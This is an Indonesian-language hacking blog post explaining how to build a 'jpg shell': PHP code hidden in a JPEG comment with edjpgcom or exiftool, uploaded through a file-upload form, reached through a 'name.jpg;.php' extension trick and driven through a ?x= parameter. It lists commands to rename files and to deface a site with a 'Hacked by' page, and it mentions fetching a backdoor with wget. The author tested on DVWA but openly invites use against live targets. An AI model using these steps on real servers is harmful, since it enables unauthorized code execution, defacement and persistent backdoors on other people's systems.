MyHeart IsYours

Jangan biarkan orang lain mengetahui dirimu

Cari...
Powered by Blogger.

Popular Posts

Tuesday, December 25, 2018

Cara Membuat Jpg Shell (Bypass Upload Form)

  Tuesday, December 25, 2018    

Judul: Cara Membuat Jpg Shell (Bypass Upload Form)
Author: ./MyHeartIsyr

Udah lama nggak ngeblog lagi :D Maaf udah hiatus selama..... (berapa hari ya :P)

Kali ini saya akan membahas tentang cara membuat jpg shell dengan bantuan tool kecil yang
bagus (hasil nemu dari blog yang lupa lagi saya namanya :P). Namanya edjpgcom,
pasti udah pada tau kan? Udah, ngaku aja :D



Teknik ini di ujicobakan (udah kaya ilmuwan aja ya :P) di localhost dengan DVWA
dan terbukti berhasil (dengan security: low), jika kalian ingin mencobanya di live target,
silakan saja :D

Ok, gak usah basa-basi kamu ngajak hepi hepi =D

1. Cari gambar berekstensi .jpg (bukan .png, .gif, apalagi .bmp) dan gambarnya
jangan yang "IYKWIM" (kita mau eksperimen, bukan mau liatin gambar syur :D)
2. buka cmd (atau terminal jika kalian pakai Linux, untuk pengguna Linux, kalian bisa pakai exiftool)
dan ketik "edjpgcom namagambar.jpg" tanpa tanda petik
3. Akan muncul window yang berisi field untuk diisi dengan komentar, nah, isi dengan script php yang
bisa dilihat di bawah
4. Upload ke DVWA (atau live target)
5. Akses file gambarnya (di DVWA, biasanya http://localhost/dvwa/hackable/uploads/namagambar.jpg)
6. Atau kalian bisa memakai teknik bypass: namagambar.jpg;.php
7. Cek file .htaccess dengan mengetik: namagambar.jpg;.php?x=dir .htaccess
8. Jika ada, maka kalian bisa mengetik: namagambar.jpg;.php?x=ren "namagambar.jpg;.php" joko.jpg
9. Ketik: namagambar.jpg;.php?x=echo ^<h1^>Hacked by ./MyHeartIsyr^</h1^>>nitip.html (jika server Windows)
atau: namagambar.jpg;.php?x=echo "<h1>Hacked by ./MyHeartIsyr</h1>">nitip.html (jika server Linux)
10. Dan kita berhasil mendeface dengan jpg shell milik kalian
(kalau kalian mau main backdoor, download aja via wget atau edit lagi file gambarnya terus tambahin script uploader)

Hah, capek juga. Tapi gak masalah, yang penting kalian semua bisa baca tulisan saya ini.
Semoga bermanfaat ya, dadah ^_^

NB: Tulisan ini dibuat pada jam 22:58 di hari Jumat, 21-12-2018 (yang mana merupakan "hari ulang tahun" kiamat palsu yang ke-6 tahun.
Kalian masih ingat kan? :D)

Dokumentasi:






   / /

  No Comments

0 Tanggapan:

Post a Comment

Subscribe to: Post Comments (Atom)